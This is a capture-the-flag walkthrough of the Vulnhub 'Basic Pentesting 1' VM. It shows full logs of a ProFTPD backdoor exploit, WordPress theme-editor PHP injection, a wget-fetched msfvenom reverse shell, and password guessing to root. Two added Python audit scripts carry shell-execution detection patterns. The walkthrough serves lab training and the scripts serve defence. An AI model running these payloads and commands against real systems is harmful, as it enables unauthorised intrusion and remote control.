# This is a walkthrough of the basic_pentesting_1.ova/csec VM from Vulnhub.
#
# It will be structured as follows:
# 0: Recon
# 0.0: NMAP results
# 0.1: Service exploration
# 0.1.0: HTTP
# 0.1.1: FTP
# 1: Exploitation
# 1.0: FTP
# 1.0.0: First blood
# 1.1: HTTP
# 1.1.0: WordPress admin user
# 1.1.1: PHP code injection --> shell
# 2: Privilege Escalation
# 2.0: User enumeration
# 2.1: Password guessing for User
# 2.2: I AM ROOT!
# 3: Greetz and supporting information
#
# 0: Recon
# After importing the .ova file the VM named csec was added, and
# networking settings were adjusted to be host-only adaptors for the
# attacking machine and the system under test. Both systems were
# assigned DHCP addresses in the 192.168.56.0/24 network. Specifically,
# the attacking machine (wrath) held the address 192.168.56.102, and
# the system under test held the address 192.168.56.101.
#
# 0.0: NMAP results
sm0key@wrath:~/hax/csec$ nmap -n -A -Pn 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-18 08:37 EST
Nmap scan report for 192.168.56.101
Host is up (0.00050s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
|   256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_  256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.77 seconds
#
# 0.1: Service exploration
# 0.1.0: HTTP
# Since most of my experience (and my preference) is in testing
# web applications, I chose to begin enumeration and exploration
# with the service running on port 80.
# First I just performed a GET request for / of the
# application to see what I was working with.
#
sm0key@wrath:~/hax/csec$ curl http://192.168.56.101/
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
</body></html>
#
# Well, that was not very useful.
# I next chose to run dirb against the root of the
# web application to see what goodies were available.
#
sm0key@wrath:~/hax/csec$ dirb http://192.168.56.101/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Jan 17 10:58:03 2018
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://192.168.56.101/secret/
+ http://192.168.56.101/server-status (CODE:403|SIZE:302)

---- Entering directory: http://192.168.56.101/secret/ ----
+ http://192.168.56.101/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.56.101/secret/wp-admin/
==> DIRECTORY: http://192.168.56.101/secret/wp-content/
==> DIRECTORY: http://192.168.56.101/secret/wp-includes/
+ http://192.168.56.101/secret/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.56.101/secret/wp-admin/ ----
+ http://192.168.56.101/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.101/secret/wp-admin/css/
==> DIRECTORY: http://192.168.56.101/secret/wp-admin/images/
==> DIRECTORY: http://192.168.56.101/secret/wp-admin/includes/
+ http://192.168.56.101/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.101/secret/wp-admin/js/
==> DIRECTORY: http://192.168.56.101/secret/wp-admin/maint/
==> DIRECTORY: http://192.168.56.101/secret/wp-admin/network/
==> DIRECTORY: http://192.168.56.101/secret/wp-admin/user/

---- Entering directory: http://192.168.56.101/secret/wp-content/ ----
+ http://192.168.56.101/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.101/secret/wp-content/plugins/
==> DIRECTORY: http://192.168.56.101/secret/wp-content/themes/

---- Entering directory: http://192.168.56.101/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/secret/wp-admin/network/ ----
+ http://192.168.56.101/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.101/secret/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.56.101/secret/wp-admin/user/ ----
+ http://192.168.56.101/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.101/secret/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.56.101/secret/wp-content/plugins/ ----
+ http://192.168.56.101/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.56.101/secret/wp-content/themes/ ----
+ http://192.168.56.101/secret/wp-content/themes/index.php (CODE:200|SIZE:0)

-----------------
END_TIME: Wed Jan 17 10:58:34 2018
DOWNLOADED: 36896 - FOUND: 13
#
# Oh look at that! She has a secret, and it
# appears to be a WordPress application. Now
# WordPress applications are, in the wild,
# pretty much ALWAYS vulnerable. I make a
# note, and decide to move on in exploration.
#
# 0.1.1: FTP
# The next thing that caught my eye was the
# FTP service.
# From the NMAP results we have a precise
# service version and product name, ProFTPD
# 1.3.3c. The first order of business is to
# throw that into searchsploit and see what
# we get.
#
sm0key@wrath:~/hax/csec$ searchsploit ProFTPD 1.3.3c
--------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                             |  Path
                                                                           | (/opt/exploit-database/)
--------------------------------------------------------------------------- ----------------------------------
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution         | exploits/linux/remote/15662.txt
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)                   | exploits/linux/remote/16921.rb
--------------------------------------------------------------------------- ----------------------------------
#
# Looks like there is a Metasploit module
# which would give us command execution, and
# a backdoor.
#
# 1: Exploitation
# 1.0: FTP
# 1.0.0: First blood
# In the name of failing fast and often, I chose
# to attempt the Metasploit module first. In a
# real environment I would probably not go for
# Metasploit, as it has very easy to identify
# signatures for IPS/IDS/FW etc., but this is the
# lab so #YOLO!!!!
#
sm0key@wrath:~/hax/csec$ msfconsole
Found a database at /home/sm0key/.msf4/db, checking to see if it is started
Starting database at /home/sm0key/.msf4/db...success


Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!


=[ metasploit v4.16.32-dev- ]
+ -- --=[ 1726 exploits - 986 auxiliary - 300 post ]
+ -- --=[ 507 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(unix/ftp/proftpd_133c_backdoor) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(unix/ftp/proftpd_133c_backdoor) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.56.102:4444
[*] 192.168.56.101:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo nqRYDUkDUJtPBQ4b;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "nqRYDUkDUJtPBQ4b\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.56.102:4444 -> 192.168.56.101:39888) at 2018-01-18 09:40:16 -0500

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
^C
Abort session 1? [y/N] y

[*] 192.168.56.101 - Command shell session 1 closed. Reason: User exit
msf exploit(unix/ftp/proftpd_133c_backdoor) >
#
# Well, she just gave us root right off the
# hop. I mean, at this point it's game over,
# but I'm not the kind of dude who likes to
# win that easily.
# Let's keep poking this bear and see what
# else she has to show us.
#
# 1.1: HTTP
# 1.1.0: WordPress admin user
# Time to take a look at the WordPress side
# of this picture. To begin we will make a
# GET request to /secret/wp-admin/admin.php
#
sm0key@wrath:~/hax/csec$ curl -v http://192.168.56.101/secret/wp-admin/admin.php
*   Trying 192.168.56.101...
* TCP_NODELAY set
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> GET /secret/wp-admin/admin.php HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.57.0
> Accept: */*
>
< HTTP/1.1 302 Found
< Date: Thu, 18 Jan 2018 14:45:42 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Expires: Wed, 11 Jan 1984 05:00:00 GMT
< Cache-Control: no-cache, must-revalidate, max-age=0
< Location: http://vtcsec/secret/wp-login.php?redirect_to=http%3A%2F%2F192.168.56.101%2Fsecret%2Fwp-admin%2Fadmin.php&reauth=1
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host 192.168.56.101 left intact
#
# As you can see she is giving us an HTTP 302
# asking us to go to a host named 'vtcsec'. On
# a hunch I tossed a quick line in my hosts
# file.
#
sm0key@wrath:~/hax/csec$ cat /etc/hosts
127.0.0.1 localhost
192.168.56.101 vtcsec
#
# I then directed my browser back to the admin.php
# URL above.
# That gave us a WordPress login page. Now I personally
# am not capable of seeing a login form without
# typing admin <tab> admin and seeing what happens.
# In this case, like many others before, admin/admin
# worked like a champ. I was greeted with the
# administrative dashboard of the WordPress app.
#
# 1.1.1: PHP code injection --> shell
#
# Alright, so we have admin rights on the WordPress
# app. This means we probably have PHP code
# injection. This looks like a more fun thing to
# exploit. At least it will require some work.
# Let's test the theory that we can use this for
# code injection. It is important to note that when
# doing PHP injection like this, the closing PHP tag
# '?>' is not necessary, and will cause unexpected
# behavior in WordPress.
#
# I went to edit 404.php in
#
http://vtcsec/secret/wp-admin/theme-editor.php?file=404.php&theme=twentyseventeen
#
# For the smoke test I chose phpinfo(). I removed
# all the code from the template, and replaced it
# with:
#
<?php phpinfo();
#
# Visiting the modified file at
#
http://vtcsec/secret/wp-content/themes/twentyseventeen/404.php
#
# did indeed show our phpinfo page as expected.
# We now have command execution. Now we just
# need to get a shell from her. I used the below
# series of payloads to identify what was
# available, and prepare for my final approach.
#
Payload:
<?php echo(`which curl 2>&1`);
Response:
''
Payload:
<?php echo(`which wget 2>&1`);
Response:
/usr/bin/wget
Payload:
<?php echo(`ls -lah 2>&1`);
Response:
total 544K
drwxr-xr-x 5 www-data www-data 4.0K Nov 15 19:14 .
drwxr-xr-x 5 www-data www-data 4.0K Nov 15 19:14 ..
-rw-r--r-- 1 www-data www-data   27 Jan 18 10:14 404.php
-rw-r--r-- 1 www-data www-data 3.3K Nov  1 18:43 README.txt
-rw-r--r-- 1 www-data www-data 1.8K Nov  1  2016 archive.php
drwxr-xr-x 5 www-data www-data 4.0K Nov 15 19:14 assets
-rw-r--r-- 1 www-data www-data 2.3K Dec 16  2016 comments.php
-rw-r--r-- 1 www-data www-data 1.3K Apr 18  2017 footer.php
-rw-r--r-- 1 www-data www-data 1.6K Jan  6  2017 front-page.php
-rw-r--r-- 1 www-data www-data  19K Oct  4 19:53 functions.php
-rw-r--r-- 1 www-data www-data 1.8K Dec 20  2016 header.php
drwxr-xr-x 2 www-data www-data 4.0K Nov 15 19:14 inc
-rw-r--r-- 1 www-data www-data 2.1K Nov  1  2016 index.php
-rw-r--r-- 1 www-data www-data  965 Oct 23  2016 page.php
-rw-r--r-- 1 www-data www-data 9.4K Oct  4 19:35 rtl.css
-rw-r--r-- 1 www-data www-data 356K Oct 20  2016 screenshot.png
-rw-r--r-- 1 www-data www-data 2.0K Nov  1  2016 search.php
-rw-r--r-- 1 www-data www-data  948 Dec 16  2016 searchform.php
-rw-r--r-- 1 www-data www-data  505 Oct  2 18:04 sidebar.php
-rw-r--r-- 1 www-data www-data 1.6K Dec 16  2016 single.php
-rw-r--r-- 1 www-data www-data  82K Nov  1 18:43 style.css
drwxr-xr-x 7 www-data www-data 4.0K Nov 15 19:14 template-parts
Payload:
<?php echo(`whoami 2>&1`);
Response:
www-data
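#
# Added example, not from the original walkthrough: a defender-side audit
# of the theme-editor injection above. It flags PHP templates in a theme
# directory that contain shell-execution primitives such as the backtick
# payloads used here, and checks whether wp-config.php sets
# DISALLOW_FILE_EDIT, which removes the editor that made the injection
# possible. The theme files and wp-config snippets are constructed samples,
# not taken from the VM.
#
```python
import os
import re
import tempfile

# Shell-execution primitives that have no place in a theme template:
# backtick command substitution (as in the payloads above) and the PHP
# functions that run commands or arbitrary code.
SHELL_EXEC_RE = re.compile(
    r"`[^`]*`|\b(?:shell_exec|system|passthru|exec|popen|proc_open|eval)\s*\(",
    re.IGNORECASE,
)

# Matches define('DISALLOW_FILE_EDIT', true); in wp-config.php, which
# hides the theme/plugin editor used for the injection above.
FILE_EDIT_RE = re.compile(
    r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.IGNORECASE
)


def audit_theme_dir(theme_dir):
    """Return sorted (filename, matched_text) pairs for PHP files in
    theme_dir that contain a shell-execution primitive."""
    findings = []
    for name in sorted(os.listdir(theme_dir)):
        if not name.endswith(".php"):
            continue
        with open(os.path.join(theme_dir, name), encoding="utf-8",
                  errors="replace") as fh:
            match = SHELL_EXEC_RE.search(fh.read())
        if match:
            findings.append((name, match.group(0)))
    return findings


def file_edit_disabled(wp_config_src):
    """True if the wp-config.php source disables the built-in file editor."""
    return FILE_EDIT_RE.search(wp_config_src) is not None


# Constructed sample theme: an untouched template beside a 404.php
# rewritten into a command stub like the ones above.
SAMPLE_THEME = {
    "index.php": "<?php get_header(); ?>\n<p>Nothing here.</p>\n<?php get_footer();",
    "404.php": "<?php echo(`wget http://192.168.56.102:1234/myshell 2>&1`);",
    "style.css": "/* Theme Name: sample */",
}


def run_sample():
    """Write the sample theme to a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as theme_dir:
        for name, body in SAMPLE_THEME.items():
            with open(os.path.join(theme_dir, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return audit_theme_dir(theme_dir)


if __name__ == "__main__":
    for name, hit in run_sample():
        print("suspicious template %s: %s" % (name, hit))
    print("editor disabled:",
          file_edit_disabled("define('DISALLOW_FILE_EDIT', true);"))
```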
#
# Sweet, so at this point we know that we
# have access to wget, and are in a directory
# to which we may write. I take a moment to
# prepare a quick reverse shell.
#
sm0key@wrath:~/hax/csec$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 -f elf >myshell
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
#
# Next I launched an instance of SimpleHTTPServer
# and pulled down my package. Then I changed the
# permissions, and prepared for execution.
#
Server side:
sm0key@wrath:~/hax/csec$ python -m SimpleHTTPServer 1234
Serving HTTP on 0.0.0.0 port 1234 ...
192.168.56.101 - - [18/Jan/2018 10:27:03] "GET /myshell HTTP/1.1" 200 -
^CTraceback (most recent call last):
  File "/usr/lib/python2.7/runpy.py", line 174, in _run_module_as_main
    "__main__", fname, loader, pkg_name)
  File "/usr/lib/python2.7/runpy.py", line 72, in _run_code
    exec code in run_globals
  File "/usr/lib/python2.7/SimpleHTTPServer.py", line 235, in <module>
    test()
  File "/usr/lib/python2.7/SimpleHTTPServer.py", line 231, in test
    BaseHTTPServer.test(HandlerClass, ServerClass)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 610, in test
    httpd.serve_forever()
  File "/usr/lib/python2.7/SocketServer.py", line 231, in serve_forever
    poll_interval)
  File "/usr/lib/python2.7/SocketServer.py", line 150, in _eintr_retry
    return func(*args)
KeyboardInterrupt
Victim side:
Payload:
<?php echo(`wget http://192.168.56.102:1234/myshell 2>&1`);
Response:
--2018-01-18 10:27:03--  http://192.168.56.102:1234/myshell
Connecting to 192.168.56.102:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 336 [application/octet-stream]
Saving to: 'myshell'

     0K                                                   100% 43.7M=0s

2018-01-18 10:27:03 (43.7 MB/s) - 'myshell' saved [336/336]
Payload:
<?php echo(`chmod 755 ./myshell && ls -lah ./myshell 2>&1`);
Response:
-rwxr-xr-x 1 www-data www-data 336 Jan 18 10:22 ./myshell
#
# Alright, we have the shell up there and
# it is ready to execute. Now to spin up
# Metasploit to catch the call back and
# we should be in.
#
Payload:
<?php echo(`./myshell`);
Response:
sm0key@wrath:~/hax/csec$ msfconsole

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


=[ metasploit v4.16.32-dev- ]
+ -- --=[ 1726 exploits - 986 auxiliary - 300 post ]
+ -- --=[ 507 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.102   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.102:4444
[*] Sending stage (857352 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.101:39970) at 2018-01-18 11:00:07 -0500

meterpreter > shell
Process 2153 created.
Channel 1 created.
python -c 'import pty; pty.spawn("/bin/bash")'
#
# 2: Privilege Escalation
# 2.0: User enumeration
#
www-data@vtcsec:~/html/secret/wp-content/themes/twentyseventeen$ cd /home/
cd /home/
www-data@vtcsec:/home$ ls
ls
marlinspike
www-data@vtcsec:/home$
#
# Now we have the name of a standard user.
# Next I decided, just for grins, to try to
# ssh to the user with some simple passwords.
#
# 2.1: Password guessing for User
#
sm0key@wrath:~/hax/csec$ ssh marlinspike@192.168.56.101
marlinspike@192.168.56.101's password: marlinspike
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

19 packages can be updated.
19 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

marlinspike@vtcsec:~$
#
# Looks like the password was just the username.
# This is not an uncommon thing, and it was a
# lucky guess. Let's see if the user is able
# to sudo to root.
#
marlinspike@vtcsec:~$ sudo su
[sudo] password for marlinspike: marlinspike
#
# 2.2: I AM ROOT!
# Annnnnnnnd root.
#
root@vtcsec:/home/marlinspike# id
uid=0(root) gid=0(root) groups=0(root)
root@vtcsec:/home/marlinspike#
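#
# Added example, not from the original walkthrough: a sudoers audit for the
# step above, where a plain user's own guessable password was all that stood
# between a foothold and root. It parses user/group specification lines and
# reports every principal allowed to run ALL commands as root, and whether
# NOPASSWD applies. The sudoers content is a constructed sample; includes,
# aliases and multi-command lists are assumed absent and are not expanded.
#
```python
import re

# Constructed sample sudoers content (not the VM's real file). The
# marlinspike line models the situation above: any command as root,
# gated only by the user's own password.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root        ALL=(ALL:ALL) ALL
marlinspike ALL=(ALL:ALL) ALL
deploy      ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart app
backup      ALL=(ALL) NOPASSWD: ALL
%admin      ALL=(ALL) ALL
%sudo       ALL=(ALL:ALL) ALL
"""

# who  hosts = (runas_user[:runas_group]) [TAG: ...] commands
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return one dict per user/group specification line. Comments, blank
    lines and Defaults are skipped; aliases and includes are not expanded."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rule = m.groupdict()
        rule["tags"] = [t.strip() for t in rule["tags"].split(":") if t.strip()]
        rule["cmds"] = rule["cmds"].strip()
        rules.append(rule)
    return rules


def full_root_rules(rules):
    """Return (who, nopasswd) for rules that allow ALL commands as root:
    runas user ALL, root, or omitted (sudo's default target user is root)."""
    found = []
    for r in rules:
        runas_user = (r["runas"] or "root").split(":")[0].strip()
        if r["cmds"] == "ALL" and runas_user in ("ALL", "root"):
            found.append((r["who"], "NOPASSWD" in r["tags"]))
    return found


def user_has_full_root(user, groups, rules):
    """True if the user, directly or through a %group, matches a rule
    that grants ALL commands as root."""
    principals = {user} | {"%" + g for g in groups}
    return any(who in principals for who, _ in full_root_rules(rules))


if __name__ == "__main__":
    parsed = parse_sudoers(SAMPLE_SUDOERS)
    for who, nopasswd in full_root_rules(parsed):
        print("%-12s full root%s" % (who, " (NOPASSWD)" if nopasswd else ""))
    print("marlinspike has full root:",
          user_has_full_root("marlinspike", ["marlinspike"], parsed))
```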
#
# 3: Greetz and supporting information
#
# Greetz to:
# Josiah Pierce
# Gh0s7
# B0n3s
# Fuz3
# Thank you boys for giving me a play space!
#
# Supporting information:
# VM location: https://www.vulnhub.com/entry/basic-pentesting-1,216/
# dirb: https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
# nmap: https://nmap.org/
# metasploit: https://www.metasploit.com/
#
# That's a wrap. Thanks for the read.
# Sm0key
#